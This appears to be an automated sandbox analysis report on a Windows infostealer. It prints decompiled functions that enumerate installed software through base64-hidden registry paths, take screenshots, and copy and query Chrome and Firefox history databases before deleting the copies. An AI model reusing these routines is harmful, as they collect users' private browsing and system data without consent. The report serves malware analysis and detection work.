                                                                                                                                                                                              0x00416379
                                                                                                                                                                                              0x00416384
                                                                                                                                                                                              0x0041638f
                                                                                                                                                                                              0x0041639f
                                                                                                                                                                                              0x004163af
                                                                                                                                                                                              0x004163ba
                                                                                                                                                                                              0x004163c5
                                                                                                                                                                                              0x004163d5
                                                                                                                                                                                              0x004163e5
                                                                                                                                                                                              0x004163f0
                                                                                                                                                                                              0x004163fb
                                                                                                                                                                                              0x0041640b
                                                                                                                                                                                              0x0041641b
                                                                                                                                                                                              0x00416426
                                                                                                                                                                                              0x00416431
                                                                                                                                                                                              0x00416441
                                                                                                                                                                                              0x00416451

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00407500: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9
                                                                                                                                                                                                • Part of subcall function 00407500: RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,?), ref: 00407582
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Open$EnumFreeString$QueryValue
                                                                                                                                                                                              • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                                                                                                              • API String ID: 811798878-3013244427
                                                                                                                                                                                              • Opcode ID: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                              • Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
                                                                                                                                                                                              • Opcode Fuzzy Hash: de493516d1551eb8ed3128fa62d2f5255a1c7b72798445e0c46a5ea88ad76063
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004178B4, Relevance: 15.2, APIs: 10, Instructions: 162windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E004178B4(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct HWND__* _v48;
				struct HWND__* _v52;
				struct HWND__* _v56;
				char _v60;
				intOrPtr _v124;
				char _v132;
				char _v148;
				char* _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				void* _v176;
				char _v180;
				intOrPtr* _t78;
				struct HDC__* _t100;
				intOrPtr _t107;
				void* _t112;
				void* _t114;
				struct HDC__* _t116;
				struct HDC__* _t118;
				void* _t121;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t121);
				_push(0x417adb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xffffff50;
				if( *0x41c868 != 0 &&  *0x41c86c != 0 &&  *0x41c870 != 0 &&  *0x41c874 != 0 &&  *0x41c878 != 0 &&  *0x41c87c != 0 &&  *0x41c880 != 0 &&  *0x41c884 != 0 &&  *0x41c888 != 0 &&  *0x41c88c != 0) {
					_v60 = 1;
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_push(0);
					_push( &_v60);
					_push( &_v20);
					if( *0x41c86c() == 0) {
						_t100 = GetDC(0);
						_t116 = CreateCompatibleDC(0);
						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
						SelectObject(_t116, _t112);
						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
						 *0x41c888(0, 0xffffffff, E00404900( &_v28));
						 *0x41c874(_t112, 0,  &_v24);
						E004177E0(_a8, _t100,  &_v148, _t112, _t116);
						_v180 = 1;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t114 = _t112;
						_t118 = _t116;
						_v160 = 1;
						_v156 = 4;
						_v152 =  &_a12;
						 *0x41c884(_v24, _v28,  &_v148,  &_v180);
						_t78 = _v28;
						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
						 *0x41c88c(_v28,  &_v32);
						GlobalFix(_v32);
						E004035D4(_a4, _v124, _v32);
						 *0x41c880(_v24);
						GlobalUnWire(_v32);
						DeleteObject(_t114);
						DeleteDC(_t118);
						ReleaseDC(0, _t100);
						 *0x41c870(_v20);
					}
				}
				_pop(_t107);
				 *[fs:eax] = _t107;
				_push(E00417AE2);
				return E00404900( &_v28);
			}






























                                                                                                                                                                                              0x004178c2
                                                                                                                                                                                              0x004178c5
                                                                                                                                                                                              0x004178c8
                                                                                                                                                                                              0x004178cb
                                                                                                                                                                                              0x004178d0
                                                                                                                                                                                              0x004178d1
                                                                                                                                                                                              0x004178d6
                                                                                                                                                                                              0x004178d9
                                                                                                                                                                                              0x004178e3
                                                                                                                                                                                              0x0041795e
                                                                                                                                                                                              0x00417965
                                                                                                                                                                                              0x0041796c
                                                                                                                                                                                              0x00417973
                                                                                                                                                                                              0x0041797a
                                                                                                                                                                                              0x0041797f
                                                                                                                                                                                              0x00417983
                                                                                                                                                                                              0x0041798c
                                                                                                                                                                                              0x00417999
                                                                                                                                                                                              0x004179a2
                                                                                                                                                                                              0x004179b2
                                                                                                                                                                                              0x004179b6
                                                                                                                                                                                              0x004179d6
                                                                                                                                                                                              0x004179e8
                                                                                                                                                                                              0x004179f5
                                                                                                                                                                                              0x00417a04
                                                                                                                                                                                              0x00417a09
                                                                                                                                                                                              0x00417a20
                                                                                                                                                                                              0x00417a21
                                                                                                                                                                                              0x00417a22
                                                                                                                                                                                              0x00417a23
                                                                                                                                                                                              0x00417a24
                                                                                                                                                                                              0x00417a25
                                                                                                                                                                                              0x00417a26
                                                                                                                                                                                              0x00417a30
                                                                                                                                                                                              0x00417a3d
                                                                                                                                                                                              0x00417a59
                                                                                                                                                                                              0x00417a65
                                                                                                                                                                                              0x00417a6b
                                                                                                                                                                                              0x00417a76
                                                                                                                                                                                              0x00417a80
                                                                                                                                                                                              0x00417a8f
                                                                                                                                                                                              0x00417a98
                                                                                                                                                                                              0x00417aa2
                                                                                                                                                                                              0x00417aa8
                                                                                                                                                                                              0x00417aae
                                                                                                                                                                                              0x00417ab6
                                                                                                                                                                                              0x00417abf
                                                                                                                                                                                              0x00417abf
                                                                                                                                                                                              0x0041798c
                                                                                                                                                                                              0x00417ac7
                                                                                                                                                                                              0x00417aca
                                                                                                                                                                                              0x00417acd
                                                                                                                                                                                              0x00417ada

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00417994
                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041799D
                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,0041A69E,?), ref: 004179AD
                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004179B6
                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,0041A69E,?,00000000,00000000,?,00CC0020), ref: 004179D6
                                                                                                                                                                                              • GlobalFix.KERNEL32 ref: 00417A80
                                                                                                                                                                                              • GlobalUnWire.KERNEL32(?), ref: 00417AA2
                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00417AA8
                                                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00417AAE
                                                                                                                                                                                              • ReleaseDC.USER32 ref: 00417AB6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 914135935-0
                                                                                                                                                                                              • Opcode ID: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                              • Instruction ID: 9ea5443061d6a736e16c7905b4946b830ee6406ef7c7b01cecb07d86951751fb
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6339665ace03b91d436a6d8c1ab4105ac859371922734f0929d45322917c03e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B513CB1944208AFDB10EFA5DC85BEF7BF8AB48305F24402AF614E62D1D7789985CB58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004129A4, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 49%
                                                                                                                                                                                              			E004129A4(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				long _t73;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x6f747365
				E004040F4(_t3);
				_push(_t217);
				_push(0x412c71);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t4 =  &_v28; // 0x6f747351
				E00403B80(_t4);
				_push(_t217);
				_push(0x412be7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				_t73 = GetTickCount();
				_t5 =  &_v60; // 0x6f747331
				E00406FDC(_t73, __ebx, _t5, __esi, _t223);
				_push(_v60);
				_t7 =  &_v64; // 0x6f74732d
				E00406F1C(_t7, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				_t10 =  &_v40; // 0x6f747345
				E0040781C(_v8, _t177, _t10, _t223);
				_t12 =  &_v72; // 0x6f747325
				E004062D8(L"%TEMP%", _t12, _t223);
				_push(_v72);
				_push(0x412ca8);
				_push(_v32);
				E00403E1C();
				_t17 =  &_v44; // 0x6f747341
				E0040781C(_v68, _t177, _t17, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				_t20 =  &_v76; // 0x6f747321
				E0040377C(_t20, _v44);
				_t23 =  &_v36; // 0x6f747349
				E00404AFC(_v76, _t177, _t178, _t23, _t215, _t223);
				_t24 =  &_v80; // 0x6f74731d
				E00403D2C(_t24, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(E00412D70);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412d78);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x412d84);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412C78);
				_t58 =  &_v92; // 0x6f747311
				E00403B98(_t58, 4);
				_t59 =  &_v76; // 0x6f747321
				E004034E4(_t59);
				_t60 =  &_v72; // 0x6f747325
				E00403B98(_t60, 4);
				_t61 =  &_v56; // 0x6f747335
				E00403508(_t61, 3);
				_t62 =  &_v44; // 0x6f747341
				E00403B98(_t62, 2);
				_t63 =  &_v36; // 0x6f747349
				E004034E4(_t63);
				_t64 =  &_v32; // 0x6f74734d
				E00403B98(_t64, 2);
				_t65 =  &_v8; // 0x6f747365
				return E00403B80(_t65);
			}















































                                                                                                                                                                                              0x004129a4
                                                                                                                                                                                              0x004129a4
                                                                                                                                                                                              0x004129a5
                                                                                                                                                                                              0x004129a7
                                                                                                                                                                                              0x004129ac
                                                                                                                                                                                              0x004129ac
                                                                                                                                                                                              0x004129ae
                                                                                                                                                                                              0x004129b0
                                                                                                                                                                                              0x004129b0
                                                                                                                                                                                              0x004129b0
                                                                                                                                                                                              0x004129b3
                                                                                                                                                                                              0x004129b4
                                                                                                                                                                                              0x004129b5
                                                                                                                                                                                              0x004129b6
                                                                                                                                                                                              0x004129b9
                                                                                                                                                                                              0x004129bc
                                                                                                                                                                                              0x004129bf
                                                                                                                                                                                              0x004129c6
                                                                                                                                                                                              0x004129c7
                                                                                                                                                                                              0x004129cc
                                                                                                                                                                                              0x004129cf
                                                                                                                                                                                              0x004129d2
                                                                                                                                                                                              0x004129d5
                                                                                                                                                                                              0x004129dc
                                                                                                                                                                                              0x004129dd
                                                                                                                                                                                              0x004129e2
                                                                                                                                                                                              0x004129e5
                                                                                                                                                                                              0x004129e8
                                                                                                                                                                                              0x004129ed
                                                                                                                                                                                              0x004129f0
                                                                                                                                                                                              0x004129f5
                                                                                                                                                                                              0x004129f8
                                                                                                                                                                                              0x004129fb
                                                                                                                                                                                              0x00412a00
                                                                                                                                                                                              0x00412a03
                                                                                                                                                                                              0x00412a10
                                                                                                                                                                                              0x00412a15
                                                                                                                                                                                              0x00412a1b
                                                                                                                                                                                              0x00412a20
                                                                                                                                                                                              0x00412a28
                                                                                                                                                                                              0x00412a2d
                                                                                                                                                                                              0x00412a30
                                                                                                                                                                                              0x00412a35
                                                                                                                                                                                              0x00412a40
                                                                                                                                                                                              0x00412a48
                                                                                                                                                                                              0x00412a4b
                                                                                                                                                                                              0x00412a55
                                                                                                                                                                                              0x00412a64
                                                                                                                                                                                              0x00412a69
                                                                                                                                                                                              0x00412a6f
                                                                                                                                                                                              0x00412a77
                                                                                                                                                                                              0x00412a7a
                                                                                                                                                                                              0x00412a7f
                                                                                                                                                                                              0x00412a85
                                                                                                                                                                                              0x00412a94
                                                                                                                                                                                              0x00412ab0
                                                                                                                                                                                              0x00412ab7
                                                                                                                                                                                              0x00412ab9
                                                                                                                                                                                              0x00412abc
                                                                                                                                                                                              0x00412abe
                                                                                                                                                                                              0x00412ad7
                                                                                                                                                                                              0x00412ade
                                                                                                                                                                                              0x00412ae0
                                                                                                                                                                                              0x00412ae3
                                                                                                                                                                                              0x00412ae5
                                                                                                                                                                                              0x00412baa
                                                                                                                                                                                              0x00412bae
                                                                                                                                                                                              0x00412bb5
                                                                                                                                                                                              0x00412bb8
                                                                                                                                                                                              0x00412bbb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00412af3
                                                                                                                                                                                              0x00412afb
                                                                                                                                                                                              0x00412b03
                                                                                                                                                                                              0x00412b0e
                                                                                                                                                                                              0x00412b1f
                                                                                                                                                                                              0x00412b2a
                                                                                                                                                                                              0x00412b3b
                                                                                                                                                                                              0x00412b46
                                                                                                                                                                                              0x00412b4d
                                                                                                                                                                                              0x00412b4f
                                                                                                                                                                                              0x00412b57
                                                                                                                                                                                              0x00412b5c
                                                                                                                                                                                              0x00412b5f
                                                                                                                                                                                              0x00412b6a
                                                                                                                                                                                              0x00412b6f
                                                                                                                                                                                              0x00412b72
                                                                                                                                                                                              0x00412b7d
                                                                                                                                                                                              0x00412b82
                                                                                                                                                                                              0x00412b85
                                                                                                                                                                                              0x00412b90
                                                                                                                                                                                              0x00412b95
                                                                                                                                                                                              0x00412b98
                                                                                                                                                                                              0x00412ba5
                                                                                                                                                                                              0x00412ba5
                                                                                                                                                                                              0x00412baa
                                                                                                                                                                                              0x00412ae5
                                                                                                                                                                                              0x00412bc1
                                                                                                                                                                                              0x00412bc5
                                                                                                                                                                                              0x00412bcc
                                                                                                                                                                                              0x00412bd3
                                                                                                                                                                                              0x00412bda
                                                                                                                                                                                              0x00412bdf
                                                                                                                                                                                              0x00412be2
                                                                                                                                                                                              0x00412bf7
                                                                                                                                                                                              0x00412c05
                                                                                                                                                                                              0x00412a96
                                                                                                                                                                                              0x00412a98
                                                                                                                                                                                              0x00412a9b
                                                                                                                                                                                              0x00412a9b
                                                                                                                                                                                              0x00412c0c
                                                                                                                                                                                              0x00412c0f
                                                                                                                                                                                              0x00412c12
                                                                                                                                                                                              0x00412c17
                                                                                                                                                                                              0x00412c1f
                                                                                                                                                                                              0x00412c24
                                                                                                                                                                                              0x00412c27
                                                                                                                                                                                              0x00412c2c
                                                                                                                                                                                              0x00412c34
                                                                                                                                                                                              0x00412c39
                                                                                                                                                                                              0x00412c41
                                                                                                                                                                                              0x00412c46
                                                                                                                                                                                              0x00412c4e
                                                                                                                                                                                              0x00412c53
                                                                                                                                                                                              0x00412c56
                                                                                                                                                                                              0x00412c5b
                                                                                                                                                                                              0x00412c63
                                                                                                                                                                                              0x00412c68
                                                                                                                                                                                              0x00412c70

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004129E8
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412CA8,?,.tmp,?,?,00000000,00412BE7,?,00000000,00412C71,?,00000000), ref: 00412A64
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00412C05
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • , xrefs: 00412B98
                                                                                                                                                                                              • .tmp, xrefs: 00412A03
                                                                                                                                                                                              • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412ACE
                                                                                                                                                                                              • %TEMP%, xrefs: 00412A23
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                                                                                                              • API String ID: 2381671008-351388873
                                                                                                                                                                                              • Opcode ID: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                              • Instruction ID: 01415e14dcc46a11cfd4ad831b9185370b0be0c5393ee3a374a7f2b0250afb3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef1d475732b00c6658fc3908e371784fc5ab7c3495e9950f6ff69cc71723a14a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05810C31A00109AFDB00EF95DD82ADEBBB9EF48315F204436F514F7292DB78AE558B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041256C, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 222fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 43%
                                                                                                                                                                                              			E0041256C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t86;
				intOrPtr* _t101;
				void* _t103;
				intOrPtr* _t105;
				intOrPtr* _t109;
				intOrPtr* _t138;
				void* _t140;
				intOrPtr* _t142;
				void* _t144;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t164;
				void* _t166;
				void* _t178;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t213;
				intOrPtr _t217;
				intOrPtr _t218;
				void* _t219;
				void* _t220;

				_t215 = __esi;
				_t177 = __ebx;
				_t217 = _t218;
				_t178 = 0xb;
				do {
					_push(0);
					_push(0);
					_t178 = _t178 - 1;
					_t223 = _t178;
				} while (_t178 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t217);
				_push(0x412839);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00403B80( &_v28);
				_push(_t217);
				_push(0x4127af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t218;
				E00406FDC(GetTickCount(), __ebx,  &_v60, __esi, _t223);
				_push(_v60);
				E00406F1C( &_v64, __ebx, __edi, __esi, _t223);
				_push(_v64);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t177,  &_v40, _t223);
				E004062D8(L"%TEMP%",  &_v72, _t223);
				_push(_v72);
				_push(0x412870);
				_push(_v32);
				E00403E1C();
				E0040781C(_v68, _t177,  &_v44, _t223);
				_t86 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t86, 0xffffffff);
				E0040377C( &_v76, _v44);
				E00404AFC(_v76, _t177, _t178,  &_v36, _t215, _t223);
				E00403D2C( &_v80, _v36);
				if(E004076B0(_v80, _t177, _t178) != 0) {
					_t101 =  *0x41b55c; // 0x41c784
					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
					_t219 = _t218 + 8;
					__eflags = _t103;
					if(_t103 == 0) {
						_t138 =  *0x41b5cc; // 0x41c78c
						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME(moz_historyvisits.visit_date/1000000, \"unixepoch\", \"localtime\"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
						_t220 = _t219 + 0x14;
						__eflags = _t140;
						if(_t140 == 0) {
							while(1) {
								_t142 =  *0x41b600; // 0x41c790
								_t144 =  *((intOrPtr*)( *_t142))(_v20);
								__eflags = _t144 - 0x64;
								if(_t144 != 0x64) {
									goto L9;
								}
								E004034E4( &_v48);
								E004034E4( &_v52);
								E004034E4( &_v56);
								_t152 =  *0x41b588; // 0x41c794
								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
								_t158 =  *0x41b588; // 0x41c794
								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
								_t164 =  *0x41b588; // 0x41c794
								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
								_t220 = _t220 + 0x18;
								E004036DC( &_v56, _t166);
								_push(_v28);
								_push(0x412978);
								E00403D2C( &_v84, _v48);
								_push(_v84);
								_push(0x412980);
								E00403D2C( &_v88, _v52);
								_push(_v88);
								_push(0x41298c);
								E00403D2C( &_v92, _v56);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
							}
						}
					}
					L9:
					_t105 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t105))(_v20);
					_t109 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t109))(_v16);
					_pop(_t198);
					 *[fs:eax] = _t198;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t213);
					 *[fs:eax] = _t213;
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E00412840);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B98( &_v72, 4);
				E00403508( &_v56, 3);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}














































                                                                                                                                                                                              0x0041256c
                                                                                                                                                                                              0x0041256c
                                                                                                                                                                                              0x0041256d
                                                                                                                                                                                              0x0041256f
                                                                                                                                                                                              0x00412574
                                                                                                                                                                                              0x00412574
                                                                                                                                                                                              0x00412576
                                                                                                                                                                                              0x00412578
                                                                                                                                                                                              0x00412578
                                                                                                                                                                                              0x00412578
                                                                                                                                                                                              0x0041257b
                                                                                                                                                                                              0x0041257c
                                                                                                                                                                                              0x0041257d
                                                                                                                                                                                              0x0041257e
                                                                                                                                                                                              0x00412581
                                                                                                                                                                                              0x00412587
                                                                                                                                                                                              0x0041258e
                                                                                                                                                                                              0x0041258f
                                                                                                                                                                                              0x00412594
                                                                                                                                                                                              0x00412597
                                                                                                                                                                                              0x0041259d
                                                                                                                                                                                              0x004125a4
                                                                                                                                                                                              0x004125a5
                                                                                                                                                                                              0x004125aa
                                                                                                                                                                                              0x004125ad
                                                                                                                                                                                              0x004125b8
                                                                                                                                                                                              0x004125bd
                                                                                                                                                                                              0x004125c3
                                                                                                                                                                                              0x004125c8
                                                                                                                                                                                              0x004125cb
                                                                                                                                                                                              0x004125d8
                                                                                                                                                                                              0x004125e3
                                                                                                                                                                                              0x004125f0
                                                                                                                                                                                              0x004125f5
                                                                                                                                                                                              0x004125f8
                                                                                                                                                                                              0x004125fd
                                                                                                                                                                                              0x00412608
                                                                                                                                                                                              0x00412613
                                                                                                                                                                                              0x0041261d
                                                                                                                                                                                              0x0041262c
                                                                                                                                                                                              0x00412637
                                                                                                                                                                                              0x00412642
                                                                                                                                                                                              0x0041264d
                                                                                                                                                                                              0x0041265c
                                                                                                                                                                                              0x00412678
                                                                                                                                                                                              0x0041267f
                                                                                                                                                                                              0x00412681
                                                                                                                                                                                              0x00412684
                                                                                                                                                                                              0x00412686
                                                                                                                                                                                              0x0041269f
                                                                                                                                                                                              0x004126a6
                                                                                                                                                                                              0x004126a8
                                                                                                                                                                                              0x004126ab
                                                                                                                                                                                              0x004126ad
                                                                                                                                                                                              0x00412772
                                                                                                                                                                                              0x00412776
                                                                                                                                                                                              0x0041277d
                                                                                                                                                                                              0x00412780
                                                                                                                                                                                              0x00412783
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004126bb
                                                                                                                                                                                              0x004126c3
                                                                                                                                                                                              0x004126cb
                                                                                                                                                                                              0x004126d6
                                                                                                                                                                                              0x004126e7
                                                                                                                                                                                              0x004126f2
                                                                                                                                                                                              0x00412703
                                                                                                                                                                                              0x0041270e
                                                                                                                                                                                              0x00412715
                                                                                                                                                                                              0x00412717
